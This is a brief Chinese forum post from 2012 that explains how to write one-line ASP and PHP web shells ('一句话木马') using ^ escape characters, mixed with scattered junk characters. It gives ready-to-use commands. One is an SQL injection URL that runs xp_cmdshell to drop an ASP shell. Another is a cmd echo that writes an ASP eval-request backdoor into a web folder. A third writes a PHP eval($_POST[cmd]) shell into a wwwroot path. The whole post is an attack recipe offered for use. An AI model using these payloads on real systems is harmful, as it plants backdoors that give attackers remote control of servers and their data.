用^转义字符来写ASP(一句话木马)文件的方法:- P l" a* I1 B5 I6 b
% L" ]: X3 R$ y5 a( u# [" u# t' d1.注入点后执行 http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';--
: b( o: ]3 m3 y! q4 o+ X3 c( J5 R1 e2 a1 M- A+ v* R
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >D:\doc\week6\images\2.asp
8 w/ }0 o' M- z9 Q: W5 ]
4 r' [: G C( H7 l9 _, h2 |3 r( T) Z
* t7 g+ }; d1 tPHP
% ~6 N q# B+ v% O, v; h, p$ t) _echo ^<^?php eval^($_POST[cmd])?^>>D:\hosting\wwwroot\zlhua_cn\htdocs\1.php |
发表于 2012-9-15 14:52:31
收藏
支持
反对